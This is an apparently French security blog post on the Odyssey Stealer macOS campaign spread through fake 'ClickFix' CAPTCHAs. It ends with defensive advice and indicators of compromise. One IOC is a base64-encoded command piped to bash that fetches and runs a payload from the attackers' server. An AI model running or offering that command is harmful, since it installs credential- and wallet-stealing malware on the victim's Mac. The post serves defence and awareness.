🎭 Odyssey Stealer & ClickFix : les Mac ne sont plus les chouchous intouchables d’Apple

Bienvenue dans l’ère du ClickFix 2.0, où les cybercriminels exploitent la confiance naïve et le snobisme sécuritaire des utilisateurs Mac. Cette fois, pas besoin de binaire louchant dans ton Finder, pas de pop-up douteuse qui demande un .dmg. Non, ici l’ennemi, c’est toi. Oui, toi, qui tapes religieusement une commande trouvée sur une page web parce que tu crois passer un CAPTCHA « intelligent ».
On avait déjà parlé de Clickfix : 🧬 ClickFix : le CAPTCHA que vous allez regretter d’avoir coché

Ah, les utilisateurs de Mac… Toujours convaincus d’être au-dessus de la mêlée numérique.
« Moi ? Infecté ? Non mais enfin, j’ai un Mac, voyons ! »
Spoiler : ce mythe vient de prendre une balle en pleine pomme 🍏💥.

🤡 Le scénario : un CAPTCHA qui teste ton QI (spoiler, tu perds)

Les attaquants ont inventé une ruse digne d’un tour de passe-passe de David Copperfield.

• Tu arrives sur un site légitime en apparence (tradingviewen[.]com).
• Tu tombes sur une page avec un faux CAPTCHA : « Prouvez que vous êtes humain : ouvrez Terminal et collez ça ».
• L’utilisateur, déjà convaincu que macOS est impénétrable comme Fort Knox, s’exécute.

Résultat : un echo "base64 …" | bash s’exécute, et BOUM 💣, tu viens d’inviter Odyssey Stealer chez toi. Pas besoin de .exe, pas besoin de .pkg, pas même un pauvre .app : juste ta confiance aveugle et ton copier-coller malheureux.

🕵️‍♂️ Le payload : AppleScript, mais pas celui qui te fait gagner du temps

Le code injecté déploie un AppleScript obfusqué planqué dans /tmp.
Mission :

• Fouiller ton bureau et tes documents à la recherche de .pdf, .docx, .txt (tu sais, le fichier « motsdepasse.txt » que tu pensais malin de cacher dans un sous-dossier) ;
• Récupérer tes cookies Safari et ton Keychain (donc tes logins iCloud, Google, ton Slack pro, etc.) ;
• Explorer Firefox, Chrome, Edge, Brave, Opera (oui, même Opera, paix à son âme) ;
• Et surtout : sniffer toutes traces de wallets crypto (Exodus, Wasabi, Electrum…).

En gros, ton Mac devient un buffet libre pour cybercriminels affamés.

🚚 L’exfiltration : ZIP express, destination Russie (ou pire)

Une fois l’aspirateur passé, le script compresse tout en un petit out.zip planqué dans /tmp.
Ensuite, un simple curl l’envoie à une IP (45.146.130[.]131), qui sert de panneau de contrôle Odyssey Stealer.
Puis, nettoyage : /tmp effacé → pas de traces → pas d’indices → pas de whisky pour les analystes forensic.

Les attaquants se retrouvent avec ton historique, tes cookies de session (donc accès direct à ton Gmail / LinkedIn sans mot de passe), et possiblement tes clés crypto.
Toi ? Tu continues à poster sur Mastodon que « macOS n’a pas besoin d’antivirus ».

🧨 Pourquoi c’est un problème en entreprise

À la maison, tu perds tes cryptos et tes notes de shopping.
En entreprise ? Tu perds :

• Ton compte AD (parce que ton Mac est joint au domaine comme un grand),
• Tes accès VPN,
• Tes sessions SaaS (Teams, Salesforce, etc.),
• Tes partages de fichiers (bonjour le ransomware).

Le Mac, longtemps perçu comme un enfant gâté intouchable, devient alors le cheval de Troie qui flingue tout le réseau. Et non, ce n’est pas de la science-fiction.

📱 Et iOS dans tout ça ?

Bonne nouvelle (temporairement) : iOS est relativement épargné. Le sandboxing et l’absence de terminal copiable-collable bloquent ce genre d’attaque.
Mauvaise nouvelle : les attaquants adorent innover. Demain, ça peut passer par :

• Des profils MDM piégés (installés via un lien « corporate » fake),
• Du sideloading d’app hors App Store,
• Des pages Safari qui abusent d’exploits WebKit.

Bref, ton iPhone n’est pas encore dans la ligne de mire du ClickFix, mais ça viendra.

🛡️ Comment se protéger (et éviter de passer pour un pigeon)

1. Sensibilisation : on ne copie-colle jamais une commande trouvée sur un site web random.
2. EDR / NGFW : surveiller /tmp, bloquer les IPs et URLs de C2.
3. Crypto : séparer ton wallet de ton poste de travail principal (Ledger > MacBook).
4. Admins IT : surveiller les Mac en AD comme des Windows → patchs, EDR, logs centralisés.
5. Utilisateurs Mac : arrêtez de croire que « ça n’arrive qu’aux autres ».

🧾 IOC – Indicators of Compromise

👉 À utiliser pour bloquer, monitorer ou investiguer :

🌐 Domaines malveillants

• tradingviewen[.]com

🔗 URLs observées

• hxxp://45.146.130[.]131/d/vipx14350 (AppleScript malveillant)
• hxxp://45.146.130[.]131/log (exfiltration de données)

💻 Adresse IP

• 45.146.130[.]131 – Serveur C2 identifié (Odyssey Stealer)

📂 Artefacts locaux

• /tmp/out.zip → archive exfiltrée avant envoi
• Répertoire temporaire /tmp/* (nettoyé en fin d’exécution)
• Processus liés : osascript, curl, base64 -d | bash

⚠️ Commande suspecte typique

echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXNoICY=" | base64 -d | bash

📌 Conseils rapides aux SOC/Blue Teams :

• Surveiller toute utilisation inhabituelle de base64 -d | bash.
• Monitorer osascript déclenché depuis Terminal.
• Vérifier logs proxy/pare-feu pour trafic vers 45.146.130[.]131.
• Inspecter toute création/suppression rapide de fichiers dans /tmp/.

🎬 Conclusion sarcastique

Mac n’est plus un îlot paradisiaque flottant au-dessus du cyber-chaos.
Avec Odyssey Stealer et ClickFix, les attaquants ont trouvé le moyen d’utiliser ta propre main pour tirer la gâchette.
Alors oui, tu peux continuer à dire « je n’ai pas d’antivirus, je suis sous Mac ». Mais rappelle-toi : quand tu tapes base64 -d | bash comme un bon petit soldat, ce n’est plus un MacBook Pro. C’est un MacBook Powned.

Partager cet article : Twitter LinkedIn WhatsApp

🖋️ Publié sur SecuSlice.com